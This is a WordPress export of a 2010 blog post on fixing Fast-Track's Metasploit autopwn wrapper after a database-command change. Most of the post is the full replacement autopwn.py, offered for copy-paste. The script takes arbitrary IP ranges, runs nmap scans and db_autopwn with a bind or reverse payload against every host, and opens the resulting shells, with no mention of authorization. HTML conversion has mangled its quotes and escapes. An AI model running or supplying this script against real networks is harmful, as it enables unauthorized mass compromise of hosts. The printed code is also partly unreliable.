{"id":116,"date":"2010-12-14T16:29:00","date_gmt":"2010-12-14T16:29:00","guid":{"rendered":"http:\/\/jjamwal.in\/blog\/?p=116"},"modified":"2010-12-14T16:29:00","modified_gmt":"2010-12-14T16:29:00","slug":"autopwn-automation-of-fasttrack-bug","status":"publish","type":"post","link":"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/","title":{"rendered":"Autopwn Automation of FastTrack Bug"},"content":{"rendered":"<p>Seems like there&#8217;ve been some minor changes in the MetaSploit Framework 3. One of the effects is that the the Autopwn Automation of FastTrack is not working. Running the script gives the following error:<\/p>\n<blockquote><p>.<br \/>\n.<br \/>\nmsf &gt; load db_sqlite3<br \/>\n[-]<br \/>\n[-] The functionality previously provided by this plugin has been<br \/>\n[-] integrated into the core command set. Use the new &#8216;db_driver&#8217;<br \/>\n[-] command to use a database driver other than sqlite3 (which<br \/>\n[-] is now the default). All of the old commands are the same.<br \/>\n[-]<br \/>\n[-] Failed to load plugin from \/opt\/metasploit3\/msf3\/plugins\/db_sqlite3: Deprecated plugin<br \/>\nmsf &gt; db_driver sqlite3<br \/>\n[*] Using database driver sqlite3<\/p><\/blockquote>\n<p>One solution is to open up the Msfconsole and type the commands manually. But that kind of defeats the purpose of having FastTrack installed (in a limited way of course:p ). Fortunately, the fix is very easy. All you need to do is to modify the <span style=\"font-style: italic;\">autopwn<\/span> file in <span style=\"font-style: italic;\">\/pentest\/exploits\/fasttrack\/bin\/ftsrc<\/span> directory. First open the file in any text editor of your choice and look for this line in bold:<\/p>\n<p>try:<br \/>\nchild1 = pexpect.spawn(&#8216;%smsfconsole&#8217; % (metapath))<br \/>\n# load sqlite3<br \/>\n<span style=\"font-weight: bold;\"> child1.sendline (<span style=\"font-style: italic;\">&#8216;load db_sqlite3&#8217;<\/span>)<\/span><br \/>\n# Destroy database<br \/>\nchild1.sendline (&#8216;db_destroy pentest&#8217;)<br \/>\n# Create database<br \/>\nchild1.sendline (&#8216;db_create pentest&#8217;)<\/p>\n<p>Now replace <span style=\"font-style: italic;\">db_sqlite3<\/span> with <span style=\"font-style: italic;\">db_driver sqlite3<\/span> and save the file.<br \/>\nEverything will work fine.<\/p>\n<p>Alternatively you can copy-paste the following text in a text editor and save the file as &#8220;autopwn.py&#8221; (minus quotes) in directory \/pentest\/exploits\/fasttrack\/bin\/ftsrc . You&#8217;ll need root access to replace the already existing file.<\/p>\n<blockquote><p>#!\/usr\/bin\/env python<br \/>\nimport pexpect,sys,os,time<br \/>\ntry:<br \/>\nimport psyco<br \/>\npsyco.full()<br \/>\nexcept ImportError:<br \/>\npass<br \/>\ndefinepath=os.getcwd()<br \/>\ntry:<br \/>\nipaddr=sys.argv[3]<br \/>\nexcept IndexError:<br \/>\nipaddr=raw_input(&#8220;&#8221;&#8221;<br \/>\nMetasploit Autopwn Automation<\/p><\/blockquote>\n<p>http:\/\/www.metasploit.com<\/p>\n<p>This tool specifically piggy backs some commands from the Metasploit Framework and does<br \/>\nnot modify the Metasploit Framework in anyway. This is simply to automate some tasks<br \/>\nfrom the autopwn feature already developed by the Metasploit crew.<\/p>\n<p>Simple, enter the IP ranges like you would in NMap i.e. 192.168.1.-254 or 192.168.1.1\/24<br \/>\nor whatever you want and it&#8217;ll run against those hosts. Additionally you can place NMAP<br \/>\ncommands within the autopwn ip ranges bar, for example, if you want to scan even if a<br \/>\nhost &#8220;appears down&#8221; just do -PN 192.168.1.1-254 or whatever&#8230;you can use all NMap<br \/>\nsyntaxes in the Autopwn IP Ranges portion.<\/p>\n<p>When it has completed exploiting simply type this:<\/p>\n<p>sessions -l (lists the shells spawned)<br \/>\nsessions -i (jumps you into the sessions)<\/p>\n<p>Example 1: -PN 192.168.1.1<br \/>\nExample 2: 192.168.1.1-254<br \/>\nExample 3: -P0 -v -A 192.168.1.1<br \/>\nExample 4: 192.168.1.1\/24<\/p>\n<p>Enter the ip ranges to autopwn: &#8220;&#8221;&#8221;)<br \/>\nif ipaddr == &#8216;quit&#8217; or ipaddr == &#8216;q&#8217;:<br \/>\nprint &#8220;nnExiting Fast-Track autopwn&#8230;nn&#8221;<br \/>\nsys.exit()<br \/>\n# Spawn instance of msfconsole<br \/>\ntry:<br \/>\noption1=sys.argv[4]<br \/>\nexcept IndexError:<br \/>\noption1=raw_input(&#8220;&#8221;&#8221;<br \/>\nDo you want to do a bind or reverse payload?<\/p>\n<p>Bind = direct connection to the server<br \/>\nReverse = connection originates from server<\/p>\n<p>1. Bind<br \/>\n2. Reverse<\/p>\n<p>Enter number: &#8220;&#8221;&#8221;)<br \/>\nif option1 == &#8216;quit&#8217; or option1 == &#8216;q&#8217;:<br \/>\nprint &#8220;nnExiting Fast-Track autopwn&#8230;nn&#8221;<br \/>\nsys.exit()<br \/>\nif option1 == &#8216;1&#8217;: option1=&#8217;-b&#8217;<br \/>\nif option1 == &#8216;2&#8217;: option1=&#8217;-r&#8217;<br \/>\nprint &#8220;Launching MSFConsole and prepping autopwn&#8230;&#8221;<br \/>\ntry:<br \/>\ncounter=0<br \/>\nmetapath=file(&#8220;%s\/bin\/setup\/metasploitconfig.file&#8221; % (definepath)).readlines()<br \/>\nfor line in metapath:<br \/>\nmetapath=line.rstrip()<br \/>\nexcept IOError:<br \/>\nprint &#8220;Configuration file not detected, running default path.&#8221;<br \/>\nprint &#8220;Recommend running setup.py install to configure Fast-Track.&#8221;<br \/>\nprint &#8220;Setting default directory&#8230;&#8221;<br \/>\ncounter=0<br \/>\n# BT3<br \/>\nif os.path.isfile(&#8220;\/pentest\/exploits\/framework3\/msfconsole&#8221;):<br \/>\nmetapath=&#8221;\/pentest\/exploits\/framework3\/&#8221;<br \/>\ncounter=1<br \/>\n# NUbuntu<br \/>\nif os.path.isfile(&#8220;\/tools\/exploits\/framework*\/msfconsole&#8221;):<br \/>\nmetapath=&#8221;\/tools\/exploits\/framework*\/&#8221;<br \/>\ncounter=1<br \/>\nif counter == &#8216;0&#8217;:<br \/>\nprint &#8220;Metasploit not detected..Exiting..&#8221;<br \/>\nsys.exit()<\/p>\n<p>try:<br \/>\nchild1 = pexpect.spawn(&#8216;%smsfconsole&#8217; % (metapath))<br \/>\n# load sqlite3<br \/>\nchild1.sendline (&#8216;db_driver sqlite3&#8217;)<br \/>\n# Destroy database<br \/>\nchild1.sendline (&#8216;db_destroy pentest&#8217;)<br \/>\n# Create database<br \/>\nchild1.sendline (&#8216;db_create pentest&#8217;)<br \/>\n# run actual port scans<br \/>\nchild1.sendline (&#8221;&#8217;db_nmap %s &#8221;&#8217; % (ipaddr))<br \/>\n# run actual exploitation<br \/>\nchild1.sendline (&#8216;db_autopwn -p -t -e %s&#8217; % (option1))<br \/>\nchild1.sendline (&#8216;sleep 5&#8217;)<br \/>\nchild1.sendline (&#8216;jobs -K&#8217;)<br \/>\nchild1.sendline (&#8216;nnn&#8217;)<br \/>\nchild1.sendline (&#8216;sessions -l&#8217;)<br \/>\nchild1.sendline (&#8216;echo &#8220;If it states No sessions, then you were unsuccessful. Simply type sessions -i to jump into a shell&#8221;&#8216;)<br \/>\n# jump to pid<br \/>\nchild1.interact()<br \/>\nexcept Exception: print &#8220;nExiting Fast-Track&#8230;n&#8221;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Seems like there&#8217;ve been some minor changes in the MetaSploit Framework 3. One of the effects is that the the Autopwn Automation of FastTrack is not working. Running the script gives the following error: . . msf &gt; load db_sqlite3 [-] [-] The functionality previously provided by this plugin has been [-] integrated into the&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[77,80,1],"tags":[116,188,228],"class_list":["post-116","post","type-post","status-publish","format-standard","hentry","category-linux-2","category-tutorial-2","category-uncategorized","tag-backtrack","tag-hacking","tag-linux"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.9 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Autopwn Automation of FastTrack Bug - \u0905\u0930\u0947 \u092f\u093e\u092f\u093e\u0935\u0930 \u0930\u0939\u0947\u0917\u093e \u092f\u093e\u0926?<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Autopwn Automation of FastTrack Bug - \u0905\u0930\u0947 \u092f\u093e\u092f\u093e\u0935\u0930 \u0930\u0939\u0947\u0917\u093e \u092f\u093e\u0926?\" \/>\n<meta property=\"og:description\" content=\"Seems like there&#8217;ve been some minor changes in the MetaSploit Framework 3. One of the effects is that the the Autopwn Automation of FastTrack is not working. Running the script gives the following error: . . msf &gt; load db_sqlite3 [-] [-] The functionality previously provided by this plugin has been [-] integrated into the...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/\" \/>\n<meta property=\"og:site_name\" content=\"\u0905\u0930\u0947 \u092f\u093e\u092f\u093e\u0935\u0930 \u0930\u0939\u0947\u0917\u093e \u092f\u093e\u0926?\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/jjamwalin\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/jjamwalin\" \/>\n<meta property=\"article:published_time\" content=\"2010-12-14T16:29:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/jjamwal.in\/yayavar\/wp-content\/uploads\/2022\/01\/jjamwalin-logo-2-small.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"200\" \/>\n\t<meta property=\"og:image:height\" content=\"200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Jaidev Jamwal\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@JaidevJamwal\" \/>\n<meta name=\"twitter:site\" content=\"@JaidevJamwal\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Jaidev Jamwal\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/\"},\"author\":{\"name\":\"Jaidev Jamwal\",\"@id\":\"https:\/\/jjamwal.in\/yayavar\/#\/schema\/person\/4b29cbc0fe18a86ec09a7c01177deac4\"},\"headline\":\"Autopwn Automation of FastTrack Bug\",\"datePublished\":\"2010-12-14T16:29:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/\"},\"wordCount\":708,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/jjamwal.in\/yayavar\/#\/schema\/person\/4b29cbc0fe18a86ec09a7c01177deac4\"},\"keywords\":[\"Backtrack\",\"hacking\",\"Linux\"],\"articleSection\":[\"linux\",\"Tutorial\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/\",\"url\":\"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/\",\"name\":\"Autopwn Automation of FastTrack Bug - \u0905\u0930\u0947 \u092f\u093e\u092f\u093e\u0935\u0930 \u0930\u0939\u0947\u0917\u093e \u092f\u093e\u0926?\",\"isPartOf\":{\"@id\":\"https:\/\/jjamwal.in\/yayavar\/#website\"},\"datePublished\":\"2010-12-14T16:29:00+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/jjamwal.in\/yayavar\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Autopwn Automation of FastTrack Bug\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/jjamwal.in\/yayavar\/#website\",\"url\":\"https:\/\/jjamwal.in\/yayavar\/\",\"name\":\"\u0905\u0930\u0947 \u092f\u093e\u092f\u093e\u0935\u0930 \u0930\u0939\u0947\u0917\u093e \u092f\u093e\u0926?\",\"description\":\"Travel, Defence, Books &amp; Photography\",\"publisher\":{\"@id\":\"https:\/\/jjamwal.in\/yayavar\/#\/schema\/person\/4b29cbc0fe18a86ec09a7c01177deac4\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/jjamwal.in\/yayavar\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/jjamwal.in\/yayavar\/#\/schema\/person\/4b29cbc0fe18a86ec09a7c01177deac4\",\"name\":\"Jaidev Jamwal\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/jjamwal.in\/yayavar\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/jjamwal.in\/yayavar\/wp-content\/uploads\/2022\/01\/jjamwalin-logo-2-small.jpg\",\"contentUrl\":\"https:\/\/jjamwal.in\/yayavar\/wp-content\/uploads\/2022\/01\/jjamwalin-logo-2-small.jpg\",\"width\":200,\"height\":200,\"caption\":\"Jaidev Jamwal\"},\"logo\":{\"@id\":\"https:\/\/jjamwal.in\/yayavar\/#\/schema\/person\/image\/\"},\"sameAs\":[\"http:\/\/jjamwal.in\",\"https:\/\/www.facebook.com\/jjamwalin\",\"https:\/\/www.instagram.com\/jamwal.jaidev\/\",\"https:\/\/x.com\/JaidevJamwal\",\"https:\/\/www.youtube.com\/channel\/UCuqw1ikTDrd3Lzf6RivuR6Q\"],\"url\":\"https:\/\/jjamwal.in\/yayavar\/author\/jaidev\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Autopwn Automation of FastTrack Bug - \u0905\u0930\u0947 \u092f\u093e\u092f\u093e\u0935\u0930 \u0930\u0939\u0947\u0917\u093e \u092f\u093e\u0926?","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/","og_locale":"en_US","og_type":"article","og_title":"Autopwn Automation of FastTrack Bug - \u0905\u0930\u0947 \u092f\u093e\u092f\u093e\u0935\u0930 \u0930\u0939\u0947\u0917\u093e \u092f\u093e\u0926?","og_description":"Seems like there&#8217;ve been some minor changes in the MetaSploit Framework 3. One of the effects is that the the Autopwn Automation of FastTrack is not working. Running the script gives the following error: . . msf &gt; load db_sqlite3 [-] [-] The functionality previously provided by this plugin has been [-] integrated into the...","og_url":"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/","og_site_name":"\u0905\u0930\u0947 \u092f\u093e\u092f\u093e\u0935\u0930 \u0930\u0939\u0947\u0917\u093e \u092f\u093e\u0926?","article_publisher":"https:\/\/www.facebook.com\/jjamwalin","article_author":"https:\/\/www.facebook.com\/jjamwalin","article_published_time":"2010-12-14T16:29:00+00:00","og_image":[{"width":200,"height":200,"url":"https:\/\/jjamwal.in\/yayavar\/wp-content\/uploads\/2022\/01\/jjamwalin-logo-2-small.jpg","type":"image\/jpeg"}],"author":"Jaidev Jamwal","twitter_card":"summary_large_image","twitter_creator":"@JaidevJamwal","twitter_site":"@JaidevJamwal","twitter_misc":{"Written by":"Jaidev Jamwal","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/#article","isPartOf":{"@id":"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/"},"author":{"name":"Jaidev Jamwal","@id":"https:\/\/jjamwal.in\/yayavar\/#\/schema\/person\/4b29cbc0fe18a86ec09a7c01177deac4"},"headline":"Autopwn Automation of FastTrack Bug","datePublished":"2010-12-14T16:29:00+00:00","mainEntityOfPage":{"@id":"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/"},"wordCount":708,"commentCount":0,"publisher":{"@id":"https:\/\/jjamwal.in\/yayavar\/#\/schema\/person\/4b29cbc0fe18a86ec09a7c01177deac4"},"keywords":["Backtrack","hacking","Linux"],"articleSection":["linux","Tutorial"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/","url":"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/","name":"Autopwn Automation of FastTrack Bug - \u0905\u0930\u0947 \u092f\u093e\u092f\u093e\u0935\u0930 \u0930\u0939\u0947\u0917\u093e \u092f\u093e\u0926?","isPartOf":{"@id":"https:\/\/jjamwal.in\/yayavar\/#website"},"datePublished":"2010-12-14T16:29:00+00:00","breadcrumb":{"@id":"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/jjamwal.in\/yayavar\/autopwn-automation-of-fasttrack-bug\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/jjamwal.in\/yayavar\/"},{"@type":"ListItem","position":2,"name":"Autopwn Automation of FastTrack Bug"}]},{"@type":"WebSite","@id":"https:\/\/jjamwal.in\/yayavar\/#website","url":"https:\/\/jjamwal.in\/yayavar\/","name":"\u0905\u0930\u0947 \u092f\u093e\u092f\u093e\u0935\u0930 \u0930\u0939\u0947\u0917\u093e \u092f\u093e\u0926?","description":"Travel, Defence, Books &amp; Photography","publisher":{"@id":"https:\/\/jjamwal.in\/yayavar\/#\/schema\/person\/4b29cbc0fe18a86ec09a7c01177deac4"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/jjamwal.in\/yayavar\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":["Person","Organization"],"@id":"https:\/\/jjamwal.in\/yayavar\/#\/schema\/person\/4b29cbc0fe18a86ec09a7c01177deac4","name":"Jaidev Jamwal","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/jjamwal.in\/yayavar\/#\/schema\/person\/image\/","url":"https:\/\/jjamwal.in\/yayavar\/wp-content\/uploads\/2022\/01\/jjamwalin-logo-2-small.jpg","contentUrl":"https:\/\/jjamwal.in\/yayavar\/wp-content\/uploads\/2022\/01\/jjamwalin-logo-2-small.jpg","width":200,"height":200,"caption":"Jaidev Jamwal"},"logo":{"@id":"https:\/\/jjamwal.in\/yayavar\/#\/schema\/person\/image\/"},"sameAs":["http:\/\/jjamwal.in","https:\/\/www.facebook.com\/jjamwalin","https:\/\/www.instagram.com\/jamwal.jaidev\/","https:\/\/x.com\/JaidevJamwal","https:\/\/www.youtube.com\/channel\/UCuqw1ikTDrd3Lzf6RivuR6Q"],"url":"https:\/\/jjamwal.in\/yayavar\/author\/jaidev\/"}]}},"_links":{"self":[{"href":"https:\/\/jjamwal.in\/yayavar\/wp-json\/wp\/v2\/posts\/116","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jjamwal.in\/yayavar\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jjamwal.in\/yayavar\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jjamwal.in\/yayavar\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/jjamwal.in\/yayavar\/wp-json\/wp\/v2\/comments?post=116"}],"version-history":[{"count":0,"href":"https:\/\/jjamwal.in\/yayavar\/wp-json\/wp\/v2\/posts\/116\/revisions"}],"wp:attachment":[{"href":"https:\/\/jjamwal.in\/yayavar\/wp-json\/wp\/v2\/media?parent=116"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jjamwal.in\/yayavar\/wp-json\/wp\/v2\/categories?post=116"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jjamwal.in\/yayavar\/wp-json\/wp\/v2\/tags?post=116"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}